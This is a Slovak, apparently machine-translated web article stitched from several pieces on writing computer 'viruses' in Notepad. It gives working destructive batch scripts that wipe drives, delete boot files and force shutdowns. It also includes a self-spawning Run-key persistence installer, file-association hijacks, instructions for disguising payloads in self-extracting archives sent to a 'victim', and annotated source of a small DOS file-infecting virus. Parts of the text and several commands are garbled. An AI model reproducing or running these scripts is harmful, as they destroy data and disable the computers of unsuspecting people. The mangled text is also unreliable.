Výber operačného systému

Ako sa vytvárajú počítačové vírusy. Zápis jednoduchého vírusu do poznámkového bloku. Ako vytvárať vírusy

Nemysli si, že iba autori vírusov potrebujú znalosti o tom, ako sú vírusy napísané! Z bezpečnostných dôvodov nie sú pre bežných používateľov menej dôležité. Aj letmé pochopenie toho, ako napísať vírusy do notebooku, pomôže chrániť váš počítač pred mnohými problémami.

Takto vyzerá vírus napísaný v obyčajnom poznámkovom bloku, ktorý je súčasťou každého systému od Microsoft Windows. Ale uvedomte si, že je ťažké ho nazvať vírusom, iba systémové príkazy, sú uložené vo formáte .bat. Ak chcete zmeniť rozšírenia, musíte nakonfigurovať systém:

  • Otvárame " Počítač«
  • V ponuke ideme na vrchol “ Služby„Ak to nie je viditeľné, stlačte ALT
  • V tomto menu prejdite na „ Služby„Vyberte položku“ Nastavenia priečinkov«
  • Prejdeme na kartu „ vyhliadka„A hľadaj predmet“ Skryť prípony pre registrované typy súborov«
  • Odstránime začiarknite túto položku.

Na prvý pohľad je to v poriadku - stačí niekoľko krátkych príkazových slov. Ale v skutočnosti, ak vložíte tento súbor do systémového priečinka „ system32 \\ driver \\ atd„A zapíšte to do spustenia, aby sa spustilo pri zavedení systému, potom po reštartovaní počítača nebude možné otvoriť žiadny program alebo zvoliť inú akciu na pracovnej ploche. Tieto kroky sa neodporúča opakovať, ak nemáte zručnosti na prácu so systémovým registrom!

Namiesto telnetdrive.bat skúste na spustenie použiť bezpečné príkazy: Calc (kalkulačka), Taskmgr (správca úloh) alebo Mspaint (programy na maľovanie)

Kde začať

Je čas naštudovať malý všeobecný návod na „výrobu“ takýchto súborov.

  • Najskôr otvoríme notebook;
  • Zadávame tam príkazy, t.j. v ňom vytvoríme „telo“ vírusu;
  • Ukladáme si prácu Súbor -\u003e Uložiť ako;
  • Teraz zostáva zmeniť príponu súboru . tXT na . netopier a namiesto uloženého mena zadajte meno, ktoré sa bude používať.

Napíše sa jednoduchý vírus a uloží sa do súboru. Teraz by bolo pekné zistiť, čo sa zapísalo do tela vírusu uloženého v súbore.

Začneme rozumieť v poradí od prvého riadku:

  1. @ Echovypnutý - bez tohto príkazu by sa všetko, čo je napísané, zobrazilo na obrazovke monitora.
  2. Dátum11.14 - označuje dátum vytvorenia.
  3. Akexistujúc:nebo.netopierísť doabc - kontrola existencie súboru sky.bat na jednotke C a ak nie je
  4. Kopírovať% 0 c: sky.bat - replikuje sa zmenou pôvodného názvu súboru na sky.bat
  5. Attrib +hc:nebo.netopier - skryje vytvorený súbor pred zvedavými očami.
  6. Echoc:nebo.netopier \u003e\u003eautoexec.netopier - vírus je pridaný do spustenia -.
  7. : abc - ak existuje, vykonávanie programu sa uskutoční tu.
  1. mdCRECK - vytvorí potrebný alebo nepotrebný priečinok v závislosti od účelu tvorcu vírusov.
  2. mdNOVÝ - takéto priečinky môžu zaplniť celý pevný disk používateľa.
  3. ŠtítokE:LUZER - napíše názov logickej jednotky E. V tomto prípade LUZER.
  4. doc.exe \u003d.mp3 - rozšírenie.exe bude spojené ako .mp
  5. del c: Program Files / q - všetko, čo bolo v priečinku Program Files, bude odstránené.
  6. del *. * / q - z adresára, kde sa vírus nachádza, bude odstránené všetko okrem priečinka so samotným vírusom.

Mali sme dosť zábavy, zamyslime sa nad zákonom:

  1. del% 0 - vírus urobí veci a sám sa vymaže.

Posledné, čo zostáva, je zistiť, ako to skrývajú. Len! Preformátujte súbor z prípony .bat na .exe pomocou archivátora WinRAR. Pri vytváraní archívu označte - „Vytvoriť archív SFX“ a začiarknite políčko „Spustiť po rozbalení“. Prirodzene, označujú skutočné meno, pod ktorým bol vírus vytvorený.

Zrieknutie sa zodpovednosti

Tento článok je napísaný na vzdelávacie účely a jeho autor nie je zodpovedný za akékoľvek vaše kroky. Buďte diskrétni a oceňte prácu ostatných.

Ako sa vytvárajú počítačové vírusy Trochu teórie

Počítačové vírusy - typ škodlivého softvéru, ktorý dokáže vytvárať jeho kópie a vložiť ho do kódu iných programov, oblastí systémovej pamäte, bootovacích sektorov a tiež distribuovať svoje kópie prostredníctvom rôznych komunikačných kanálov.

Počítačové vírusy majú nasledujúcu klasifikáciu:

  • Spustite vírusy - vírusy, ktoré prenikajú do bootovacieho sektoru úložných zariadení, ako sú pevné disky, flash disky, diskety atď., a môžu narušiť dostupnosť súborov.
  • Registrujte vírusy - typ vírusov, ktoré sú vložené do spustiteľných súborov (súbory s príponami COM a EXE) a negatívne ovplyvňujú ich funkčnosť.
  • Spúšťajte vírusy - vírusy, ktoré kombinujú funkcie dvoch predchádzajúcich typov vírusov;
  • Dokumentujte vírusy - typ vírusov, ktoré infikujú súbory kancelárskych systémov. Tento typ sa nazýva aj „makrovírusy“, pretože systém je infikovaný infikovaním programových makier.
  • Sieťové vírusy - druh vírusov, ktoré sa šíria používaním počítačovej siete, t.j. sieťové služby a protokoly.

Najznámejší vírus na svete sa volal ILOVEYOU. Vo svojej podstate to bol úplne neškodný červ, ktorý spamuje poštu ľudí. Svet však bol nedávno vystavený kybernetickým útokom, ktoré prinútili každého myslieť na svoju bezpečnosť. Vírus WannaCry infikoval veľa počítačov a požadoval výkupné vo výške 300 dolárov za bitcoiny. Niektorí analytici sa však domnievajú, že išlo iba o test a že dôjde k ďalšiemu útoku v oveľa väčšom rozsahu, ktorý bude zameraný na používateľov Apple.

A napriek tomu, aj keď bol program WannaCry veľmi rozšírený a získal z neho veľa peňazí, išlo o bežný program WinLocker, ktorý sa dal odstrániť. Faktom je, že platili vo väčšine bánk a spoločností, ktoré nemali čas na to prísť a 300 dolárov pre nich nie je vážna strata.

Vytvárame komické vírusy a ďalšie

Vytvorme si niekoľko vlastných vírusov, ktoré však neodporúčam kontrolovať na svojom počítači, pretože to môže skončiť veľmi zle.

Takéto vírusy môže robiť úplne každý, pretože nepotrebujeme špecializovaný softvér atď., Stačí nám notebook.

Hneď musím povedať, že náš súbor bude uložený takmer vo všetkých prípadoch, budeme vo formáte .bat, napíšem meno anyname, ale môžete dať úplne čokoľvek.

Odstrániť všetky súbory

Tento kód uložíme ako anyname.bat a je to, po spustení bude všetok obsah odstránený.

Modrá obrazovka smrti

@echo vypnutie del% systemdrive% *. * / f / s / q vypnutie -r -f -t 00

Tento kód ukladáme do súboru anyname.vbs. Upozorňujeme, že formát súboru musí byť .vbs, nie .bat.

Naformátujte disky C, D, E za tri sekundy

rd / s / q D:
rd / s / q C:
rd / s / q E:

Uložte tento súbor ako anyname.bat a spustite ho. Všetky jednotky budú naformátované za tri sekundy.

Maticový efekt | Maticový efekt

@ echo vypnuté
farba 02: triky
echo% random %% random %% random %% random %% random %% random %% random %% random%
goto triky

Uložte ho ako anyname.bat a spustite ho, nie je to pre váš počítač nebezpečné.

Vypnite počítač a deaktivujte možnosť reštartu

@echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.ini @echo off Msg * ZÍSKAL STE INFEKCIU! Shutdown -s -t 7 -c "Vírus preberá disk c: Drive

Uložte si ho ako kind.bat, JE NEBEZPEČNÉ SPUŠŤAŤ NA PC.

Súbory nahrádzame nepracujúcimi

Tento vírus nahradí nasledujúce formáty (.exe .jpeg .png .mpeg .sys)

@echo off assoc .txt \u003d jpegfile

Uložiť ako anyname.bat a spustiť.

Odstraňuje sa operačný systém

@echo off Del C: *. * | r

Uložte ho ako anyname.bat a spustite ho na počítači obete.

A to je na dnes všetko, vďaka za prečítanie článku a dúfam, že prijaté informácie nezneužijete. Ak chcete viac vírusov, tak napíšte do komentárov, urobíme to! Uložte si článok na svoje sociálne siete, aby ste sa nestratili.

Veľa šťastia v živote a vidíme sa!

"Dlhodobo šoféroval niekde v nepohodlnom tuhom obale, triasol sa a hojdal, jeho telo si vyžadovalo jedlo. Nechápal, prečo ho, ktorý sa práve narodil, vyhodili z domu ... Trasenie nakoniec prestalo a niekto bol cudzinec." a zhruba otvoril archív pripojený k listu. Vyskočil mladý zvedavý vírus a urobil svoju prvú divíziu ... “

V tomto článku sa podelím o svoje skúsenosti s písaním vírusov. Základný princíp každého vírusu možno zhrnúť do niekoľkých slov: telo vírusu sa počas jeho vykonávania interpretuje ako kód a počas infekcie ako údaj. Existuje veľa druhov vírusov a rôzne spôsoby infekcie. Samotný mechanizmus pôsobenia vírusu samozrejme závisí od konkrétneho operačného systému. Existujú napríklad vírusy, ktoré pracujú v chránenom režime procesora (maximum
a absolútne adresovanie celej pamäte). Spoločnosti ako AVP sú s týmito prípadmi veľmi náročné na čas a zdroje. Jediné, čo zachráni tvorcov antivírusových programov, je veľmi malé množstvo skutočne profesionálnych vírusov.

Aby ste sa naučili, ako sami písať vírusy, potrebujete iba základné znalosti assembleru. Myslím, že s počiatočnými znalosťami sa môžete pokúsiť napísať svoje vlastné vírusy a preskúmať tie súčasné. Iné užitočné a niekedy nevyhnutné
vedomosti prídu, keď budete študovať výtvory iných ľudí. Z prostriedkov venovaných tejto téme môžem odporučiť stránku s veľkým počtom kníh a článkov:
http://vx.netlux.org/lib_rus.shtml.
Všetky jej dokumenty sú napísané veľmi zrozumiteľne a prístupne
Jazyk. Existuje tiež známy elektronický časopis Infected Voice. Má pohodlný navigačný systém, ktorý umožňuje navigáciu v nových materiáloch (zdroje a články). Tento časopis vychádza každé pol roka (aspoň to tak bolo predtým, teraz si tým nie som istý) a obsahuje všetky novinky v tejto oblasti.

Predpokladajme, že ste našli zdroj vírusu a chcete ho preskúmať. Ako to spraviť? Úprimne povedané, je to úplne prvýkrát, čo som sa sám stretol s takýmto problémom. Moja otázka bola nasledovná: existuje vírusový text, chcem vidieť, ako to funguje, a zároveň SA TO BÁM! To je úplne skutočné: čo zabráni týmto vírusom v spálení CMOS alebo trení mojej skrutky? Odpoveď: nic. Pri nesprávnych činnostiach vám vírus môže spôsobiť ujmu, ktorú je naprogramovaný. Algoritmus pre správne činnosti je však dosť jednoduchý. Teraz na to prídeme.

Budeme predpokladať, že zdroj vírusu je napísaný v montážnom jazyku. Tento jazyk je ideálny na písanie vírusov. Ako viete, v
v assembleri existujú iba dva príkazy, ktoré sa nazývajú „skutočné“ (to znamená akcie, ktoré môžu vyprodukovať
ireverzibilné zmeny na pevnom disku alebo inde) sú to „INT“ a „OUT“, všetky ostatné príkazy pracujú s registrami a príznakmi procesora (aj keď dosť hrubé, ale všeobecne). Nepovažujeme funkcie WIN API, pretože v zásade ich možno považovať za náhradu za prerušenie systému DOS a ich volanie je náhradou za príkaz.
„INT“.

Malá pomoc pre začiatočníkov alebo pre tých, ktorí dlho nepísali v ACM: príkaz „INT“ sa používa na volanie prerušenia systému DOS alebo BIOS a príkaz „OUT“ sa používa na zápis údajov do portu. V tomto prípade je pre príkaz "INT" číslo funkcie uvedené v registri AH (najčastejšie) a
v prípade príkazu „OUT“ sa v registroch AL, AX a EAX ukladajú údaje zapísané do portu.

Takže. Vezmite akýkoľvek debugger. Odvtedy musíte porozumieť vírusom v systéme DOS (stále fungujú pod Windows)
Win), potom vykoná ktorýkoľvek debugger: Turbo debugger od spoločnosti Borland Inc., CodeView od MicroSoft, AFDPRO alebo AVPUTIL. Ďalej načítajte zdroj do debuggera a sledujte krok za krokom. Hlavné je dodržiavať LEN JEDNÉ PRAVIDLO. Dá sa to nazvať zlatým.
POZOR: môžete bezpečne spustiť zdrojový kód vírusu, ale akonáhle dosiahnete príkazy „OUT“ alebo „INT“, okamžite zastavte a spustite analýzu.

Musíte analyzovať:

  • číslo volaného portu prerušenia alebo nahrávania;
  • číslo volanej funkcie alebo údajov zapísaných do portu.

Aby ste pochopili skutočné akcie týchto príkazov, použite buď Tech Help, alebo akýkoľvek dok v ASM, alebo akýkoľvek
kniha. Hlavná vec je, že vo vašom zdroji nájdete informácie o všetkých prerušeniach a portoch.
Takže môžete prísť na to, čo urobí
bez spustenia v počítači. Počas sledovania si zapisujte všetky údaje (stav registrov, adresy príkazov, údaje o
funkcie atď.) na kúsku papiera. V čase, keď bude funkcia vyvolaná (alebo zapísaná do portu), budete plne ozbrojení a môžete určiť, čo sa stane, ak spustíte nasledujúci príkaz. Pomôže vám tiež pri komparatívnej analýze zmien v registroch a príznakoch.

Keď pochopíte, čo tento alebo ten príkaz robí („INT“ alebo „OUT“), preskočte ho a pokračujte až do
koniec súboru alebo ďalší takýto príkaz. Vďaka tomu roztriedite akýkoľvek vírus v policiach a pochopíte jeho fungovanie.

Pozrime sa na príklad. Vzal som si malý vírus napísaný určitým Reminderom a dostal som ho z jedenásteho čísla Infected Voice. Bol tam bez komentára, takže všetku prácu musel vykonať sám. Čo ja
prilákala táto tvorba: veľmi malý zdrojový kód, veľmi malá veľkosť skompilovaného spustiteľného súboru, nepochopiteľný (na prvý pohľad) algoritmus. Tu je jeho zdrojový kód (mimochodom, volá sa REM22):

Model maličký
.kód
.začiatok
štart:
pop cx
ahoj:
sekera xchg, bx
db 108 h shr 1
db 4eh; dec si
db 9eh shr 1
db 3 kanály; cmp al, xx
db 100 h shr 1
db 40 h
fmask db "*. *", 0
lodsw
cwd
mov dl, al
shl dx, 1
int 21h
jmp hel
koniec

Podľa môjho názoru je tento vírus majstrovským dielom, pretože má tak malú veľkosť
organizácia reprodukčného mechanizmu je geniálne dielo. Keď teraz analyzujeme, čo a ako robí, všetko
padne na miesto. Medzitým je potrebné poznamenať: tento vírus v zásade nemá ničivé účinky (myslím si, že za takúto reprodukciu nemožno považovať), ale infikuje všetky súbory
v rovnakom adresári. Nejde o „profesionálny“ vírus, to znamená, že mu chýba veľa mechanizmov charakteristických pre vážne výtvory:

  • neexistuje mechanizmus „priateľ / nepriateľ“ (vírus infikuje každého bez rozdielu, dokonca aj seba alebo už infikované objekty);
  • k infekcii dôjde iba v rovnakom adresári (pokúste sa ho skompilovať a spustiť v priečinku, ktorý ho obsahuje)
    nie je nikto :));
  • vírus nie je polymorfný (nešifruje sa a nemení svoj kód);
  • vírus nemá deštruktívne účinky;
  • vírus nie je rezidentom v pamäti.

Poďme sa pozrieť do nášho vnútra
premôcť. Zdrojom je model pre vytvorenie súboru exe. „.startup“ je smernica TASM “a môžete sa bez toho zaobísť, ale potom musíte napísať„ org 100h “a potom umiestniť štítok (a
na koniec za „koniec“ vložte názov štítku). Zvyšok príkazov možno ľahko nájsť v akejkoľvek knihe a zistiť, čo robia (nebuďte leniví). Zostáva len prísť na to, čo tieto tímy spoločne urobia.

Toto majstrovské dielo je obyčajný cyklus, ktorý sa opakuje 6-krát. Čo sa stane v cykle? Čo sa stane, je to, že voláme int 21h so šiestimi rôznymi funkciami (93, 4E, 3C, 40, 2E, 00). Pozeráme
v poradí znamená:

„pop cx“ slúži iba na vynulovanie cx (v hornej časti zásobníka, ako viete, je na začiatku programu nula). Za čo? A tak, že na príkaz SUB CH, (pozri, mal by byť v offsetu 108h v debuggeri) dostaneme CH \u003d 01 (pri offsete 2Ah (toto je niekde v PSP), FFh vždy klame), t.j. nemusíte sa predvádzať a stačí napísať sub ch, ffh, ale tým sa zmení programový kód ... Ukázalo sa:
*. *, 0 \u003d sub CH ,, a toto je hotová maska \u200b\u200bna hľadanie ... TAM JE KDE GENIUS !!!

To znamená, že podch, ffh je „Ae“ (v ASCII kódoch s medzerou na konci). Ďalej všetko, čo ide od posunu 101 (kód 93) k posunu 10B (kód 00), je FUNKCIA NA int 21h !!! Tých. toto je 6 funkcií, ktoré postupne voláme v slučke (ich čísla sú uvedené vyššie) a získaný kód je iba pozlátko. Toto nemá ABSOLUTNE ŽIADNY ZMYSEL! BOLO TO TAK PRI ZÍSKANÍ FUNKCIÍ V ZMLUVE. To znamená, že keď napíšem TANAT, preloží sa to do postupnosti niektorých príkazov, však? Ale toto sú v podstate dáta ... aj keď v tomto programe to nemôžete nazvať dátami, sú to iba FUNKCIE pre int 21h, to je to, čo
GÉNI !!! Nemá zmysel ďalej hovoriť - pretože v každom zo šiestich cyklov sa volá funkcia, teda všetky registre sú približne
prispôsobené ideálom ... Pozri:

Prvýkrát sa 93h nazýva funkcia: Pipe (Error) - pre samotný program NEDÁ VYKONAŤ ŽIADNE ZAŤAŽENIE, NEDĚLÁ NIČ UŽITOČNÉ, JE TO IBA NADMERNÉ, NIE JE TO POTREBNÉ, TOTO JE EXTRA CYKLUS, ALE BERE TO DO ÚVAHY genialitu kódu, jednoducho TO JE NEMOHEM Z NICH POCHÁDZAŤ !!! K dispozícii bude ešte jedna takáto „ľavá“ funkcia - pozri nižšie.

Druhá: 4Eh - to je to, čo potrebujete! Vyhľadajte súbor a v čase hovoru je posunutie masky súboru (108 h) v dx !!!

Po tretie: 3Ch - vytvorenie súboru. Toto je ďalšia „ľavá“ funkcia. Nepotrebujeme to. Nie je potrebné vytvárať súbor (koniec koncov, stačí, keď sa zapíšeme do súboru, ktorý sme našli v predchádzajúcom kroku). V DX je nejaký druh odpadu, samozrejme s
názov súboru nemá čo robiť, takže CF \u003d 1 a ideme na ďalší cyklus.

Po štvrté: 40 h - zápis do súboru. Ale to už potrebujeme! DX obsahuje offset 100h (t.j. začiatok REM22), ale CX trochu zlyhal - rovná sa 400h, t.j. vlastne na začiatok nájdeného súboru
Zapíše sa 400 h bajtov, zatiaľ čo REM22 zaberie iba 22 bajtov, t.j. Bude napísaných 1002 bajtov navyše. Toto je pravda. Ale vzhľadom na genialitu kódu :), to sa dá odpustiť.

Piata: 2Eh - Nastaviť príznak overenia. Toto je LEVÁ funkcia, tu je to jednoducho - príloha programu.

Šiesta: 00h - toto sa ukazuje ako výstup z programu (ani ja som to nevedel).

To je všetko: to znamená, že máme 6 cyklov, z ktorých iba 3 majú zmysel: hľadanie, zaznamenávanie a ukončenie.
S najväčšou pravdepodobnosťou nebudete
Poyantno. Aby ste na to prišli, načítajte zdroj do debuggeru, sledujte ho, hľadajte
o statnych udajoch v registroch pozri moje komentare. Potom sa všetko vyjasní. Nakoniec
Dávam ladiacu tabuľku, aby ste si ju sami nezostavili (pre jednu vec a uvidíte, ako by mala vyzerať). V zásade by malo stačiť,
aby sme pochopili, čo sa deje s týmto vírusom, ale myslím si, že komentáre budú užitočné.

ADR KÓD ASM 1 2 3 4 5 6
100 59 POP CX CX \u003d 0 - - - - -
101 93 XCHG AX, BX AX \u003d BX \u003d 0 AX \u003d 0, BX \u003d 9300 h AX \u003d 9300 h, BX \u003d 0 AX \u003d 0, BX \u003d 0005 h AX \u003d 0005 h, BX \u003d 0400 h AX \u003d 0400h, BX \u003d 2E00h
102 84 4E 4F TEST B + 4Fh,
CL		 - - - - - -
105 3C 80 CMP AL,
80h		 - - - - - -
107 40 INC AX AX \u003d 0001 h AX \u003d 0001 h AX \u003d 9301 h AX \u003d 0001 h AX \u003d 0006h AX \u003d 0401 h
108 2A 2E 2A 00 SUB CH, B CX \u003d 0100 h CX \u003d 0200 h CX \u003d 3 300 h CX \u003d 0400h CX \u003d 5:00 h CX \u003d 0600h
10C AD LODSW (DS: SI-\u003e AX) AX \u003d DS:
100 \u003d 9359 h		 AX \u003d DS:
102 \u003d 4E84h		 AX \u003d DS:
104 \u003d 3C4Fh		 AX \u003d DS:
106 \u003d 4080 h		 AX \u003d DS:
108 \u003d 2E2Ah		 AX \u003d DS:
10A \u003d 002Ah
10D 99 CWD (DX \u003d E (AX)) DX \u003d FFFFh DX \u003d 0000 h DX \u003d 0000 h DX \u003d 0000 h DX \u003d 0000 h DX \u003d 0000 h
10E 8A D0 MOV DL, AL DX \u003d FF59h DX \u003d 0084 h DX \u003d 004Fh DX \u003d 0080 h DX \u003d 002Ah DX \u003d 002Ah
110 D1 E2 SHL DX, 1 DX \u003d FEB2h DX \u003d 0 108 hodín DX \u003d 009Eh DX \u003d 0100 h DX \u003d 0054 h DX \u003d 0054 h
112 CD 21 INT 21 hodín AH \u003d 93 (potrubie) - chyba AH \u003d 4E
(FindFirst)		 AH \u003d 3C (CreateFile) AH \u003d 40 (WriteFile) AH \u003d 2E (SetVerifyFlag) AH \u003d 00 (ukončiť)
114 EB EB JMP KRÁTKY 101 ??? - - - ??? -

Zvláštne však je, že informácie o tom, ako vytvoriť vírus, zaujímajú nielen počítačových géniov a inteligentných programátorov, ale aj bežných používateľov osobného počítača. Niekedy sú mstiví ľudia ochotní ochotne poškodiť obeť vytvorením škodlivého softvéru, ale častejšie ide len o kybernetický žart. Akýkoľvek prienik do počítača tretími stranami alebo úmyselné poškodenie softvéru sú trestné podľa zákonov mnohých krajín. Tento článok o tom, ako vytvoriť vírus, možno použiť iba na to, aby používateľ pochopil, ako sa používajú príkazy systému Windows NT.

Vytvorenie vírusu

Každý začínajúci používateľ počítača si môže vytvoriť svoj vlastný počítačový vírus. Na to nie je vôbec potrebné mať znalosti v oblasti programovania. Stačí mať túžbu, trochu voľného času na pochopenie najjednoduchších príkazov a samozrejme počítač. Tento článok vás naučí, ako vytvoriť vírus v programe Poznámkový blok. V takom prípade budeme pracovať bez rôznych tlmočníkov, kód nebude umiestnený v špecializovaných vývojových prostrediach. Čo je podstatou tejto metódy? Náš program (vírus) sa vykoná prevedením textového súboru na dávkový súbor systému Windows s príponou (* .bat). Po jeho spustení sa vykonajú všetky udalosti, ktoré zadáte v spustiteľnom súbore. Teraz teoreticky viete, ako vytvoriť vírus, potom môžete pristúpiť k podrobnejšej štúdii tejto témy. Chcem vás varovať, že tieto vírusy nie sú určené na vážne veci. Aj keď môžu poškodiť počítač, rozsah tragédie je malý. Nebudete môcť obeti ukradnúť informácie, tým menej ju sledovať. Teraz je ten správny čas, aby sme vám ukázali, ako vytvoriť vírus. Za týmto účelom vám odporúčam naučiť sa používať príkazy na správu systému Windows NT, z ktorých niektoré budú popísané nižšie. Otvorte bežný textový editor a zadajte doň nasledujúci príkaz: @echo off.

Gratulujeme, deaktivovali ste obrazovku postupu. Po spustení vírusu nebude obeť vedieť o priebehu škodlivého kódu, pretože celý proces bude skrytý pred jej očami. Ďalej na nový riadok zadajte nasledujúci kód:% SystemRoot% / system32 / rundll32 user32, SwapMouseButton\u003e nul.

Vysvetlenie každého príkazu nemá zmysel, ale jeho podstatou je, že tlačidlá na vašej myši sú teraz naprogramované v opačnom poradí (priradenie tlačidiel bolo obrátené). Teraz tento súbor uložte a zmeňte jeho príponu (nahraďte súbor * .txt znakom * .bat). Toto je dávkový súbor systému Windows, ktorý po spustení spôsobí nefunkčnosť myši. Máte dobrý príklad toho, ako vytvoriť vírus, a ak vás zaujíma, môžete pokračovať v štúdiu týchto druhov príkazov a hlbšie sa zaoberať týmto výklenkom. Ak chcete svoju obeť vážne vystrašiť, môžete pridať nasledujúce riadky:

taskkill / f / im explorer.exe\u003e \u200b\u200bnul
vypnutie -r -t 1 -c "lol" -f\u003e nul

Prvý riadok zakážete proces „explorer.exe“ a ďalší - stačí reštartovať počítač. Vašou úlohou je pridať do vírusu nové príkazy z nového riadku, potom súbor uložiť a zmeniť jeho príponu. Si takmer hacker. Poďme teraz vložiť tento súbor do obete. Vytvorený súbor s príponou netopierov musíte umiestniť do špeciálneho archívu SFX, keď ste predtým vybrali položku „Spustiť po rozbalení“. Po otvorení archívu bude počítač obete týmto vírusom automaticky infikovaný. Zostáva iba poslať náš „darček“.

Všetko je už vymyslené

Prečo však znovuobjavovať koleso, keď nám skúsení programátori a hackeri výrazne zjednodušili život? Ako verejná doména môžete ľahko nájsť program s názvom „Generátor vírusov„ Kuzya “. Nebudete musieť manuálne zapisovať všetky príkazy. Stačí zvoliť požadovanú akciu a program za vás sám vytvorí tento škodlivý súbor.

Vytvorenie najjednoduchších vírusov si nevyžaduje špeciálne vývojové prostredia. A mimochodom tiež špeciálne vedomosti. Vytváranie vírusov pomocou príkazového riadku je celkom jednoduché. Aby ste to dosiahli, musíte poznať malú syntax príkazového riadku a vedieť vytvárať súbory .bat.

Čo je súbor .bat a ako ho môžem vytvoriť?

Na veľmi povrchnej úrovni sú to súbory s príponou .bat. Tieto súbory obsahujú príkazy, ktoré musí vykonať interpret príkazov systému Windows. Všetky príkazy, ktoré je možné vykonať v okne príkazového riadku, je možné zadať do súboru .bat a spustiť ich. Výsledok bude rovnaký.

Na vytvorenie vírusu .bat potrebujeme bežný textový editor. V ideálnom prípade je Poznámkový blok vhodný na tento účel. Po vytvorení a otvorení nového textového dokumentu musíte zadať kód (príkazy), ktorý by tam mal vykonať. Potom musíte použiť ponuku Uložiť akouložte tento súbor tým, že mu dáte názov s príponou .bat a určenie typu súboru Všetky súbory.

Vytvárame najjednoduchší vírus

V tomto článku sa pozrieme na to, ako vytvoriť vírus, ktorý po spustení donekonečna otvorí okno príkazového riadku. Nekonečné a veľmi rýchle otváranie okien príkazového riadku neumožňuje používateľovi pracovať pokojne. Nikto nebude mať čas zavrieť všetky a veľmi skoro upchajú operačnú pamäť RAM počítača, čo následne výrazne spomalí počítač až do úplného zmrazenia. Bude to vyzerať asi takto:

Okrem toho uvedieme náš vírus do spustenia, čo zabezpečí, že sa vírus spustí automaticky spolu s operačným systémom.

Kód vytváraného vírusu

Koľko programátorov, toľko rôznych riešení je možné vymyslieť pre každú úlohu. Uvediem jednu zo svojich metód riešenia takéhoto problému.

md c: \\ papka
echo start c: \\ papka \\ virus.bat\u003e c: \\ papka \\ virus.bat
reg pridať HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v virus / d c: \\ papka \\ virus.bat
attrib + r + h + s c: \\ papka
attrib + r + h + s c: \\ papka \\ virus.bat
začiatok c: \\ papka \\ virus.bat
del% 0

Teraz sa pozrime na samotný kód. Prvý riadok vytvorí priečinok s názvom papka v koreni disku C: /... Táto adresa je iba napríklad. Používanie koreňa priečinka C: / nie je pre vírus vhodný. Ak chcete zabezpečiť dobré prežitie vírusu, je najlepšie ho skryť. Prvý príkaz môžete dokonca preskočiť, ak samotný vírus vložíte do už vytvoreného adresára.

Druhý riadok vytvorí súbor c: \\ papka \\ virus.bat a pomocou príkazu echo do neho príkaz zapíše začiatok c: \\ papka \\ virus.bat... Tu musíte vedieť, že za znakom\u003e je uvedené miesto výstupu daného príkazu. Tu sa musíte oboznámiť: c: \\ papka \\ virus.bata existuje hlavné telo vírusu. Súbor .bat, ktorý sme vytvorili s kódom a ktorý teraz analyzujeme, je iba inštalátorom nášho hlavného vírusu. Pre vírus môžete použiť iný názov a iné umiestnenie.

Tretí riadok uvedie telo vírusu, ktorý sme vytvorili v druhom riadku, do spustenia. K tomu sa používa vetva registra používateľov, pretože používateľ má k nej vždy prístup. Nie je však bezpečné používať spustenie počítača, pretože používateľ nemusí mať prístup správcu, čo spôsobí zbytočnú chybu.

Štvrtý a piaty riadok kódu menia atribúty vírusu a priečinok, v ktorom je vírus uložený. S týmito príkazmi a na to slúžiacimi, pridávame atribúty Iba na čítanie, skryté a systematické pre priečinok aj pre vírus. Použitie atribútu r (iba na čítanie) nie je potrebné. A tu sú atribúty Skryté a systematické bude dobre chrániť vírus, ktorý sme vytvorili. Ak mi neveríte, tak si prečítajte článok o vírusu, ktorý. Používa presne túto technológiu.

Šiesty riadok kódu spúšťa náš vírus. Túto položku môžete preskočiť, ak chcete, aby sa vírus spustil prvýkrát až po reštartovaní počítača.

A nakoniec posledný siedmy riadok odstraňuje tento .bat vírus. Je to užitočné, pretože tento súbor .bat možno použiť na ľahký prístup k vírusu, ktorý sme vytvorili, a na jeho odstránenie.

Význam vytvoreného vírusu

Zmyslom vírusu, ktorý zapadá do týchto 7 riadkov, je vytvoriť hlavný vírus, chrániť ho a zabezpečiť jeho nepretržitú činnosť. A tiež zametajte stopy. Čo robí hlavný vírus? Po spustení hlavného vírusu vykoná príkaz, ktorý je v ňom napísaný. A tento príkaz zase spustí náš vírus, ktorý sa opäť sám spustí. A tak ďalej ad infinitum.

Ako sa vysporiadať s takýmito vírusmi?

Najprv sa začne boj proti tomuto vírusu po jeho spustení. Vírus veľmi skoro naplní RAM svojimi kópiami a nebudete môcť pohnúť ani myšou. Preto musí byť takáto šou okamžite zastavená. Tlačidlo Break na klávesnici je na to ideálne. Stláčajte ho toľko, koľko je potrebné, aby ste zastavili vytváranie nových kópií. Na klávesniciach bez tlačidla Prerušiť môže pomôcť Ctrl + C.

Ako taký vírus odstrániť?

Môžete ich zadať pri štarte (ďalšie informácie nájdete na odkaze). A tiež môžete vírus ukončiť pomocou príkazu, ktorý sa zobrazí v okne tlmočníka príkazov. Prirodzene, ak sa dostanete k skrytému a systémovému súboru. Takto vzniká jednoduchý vírus.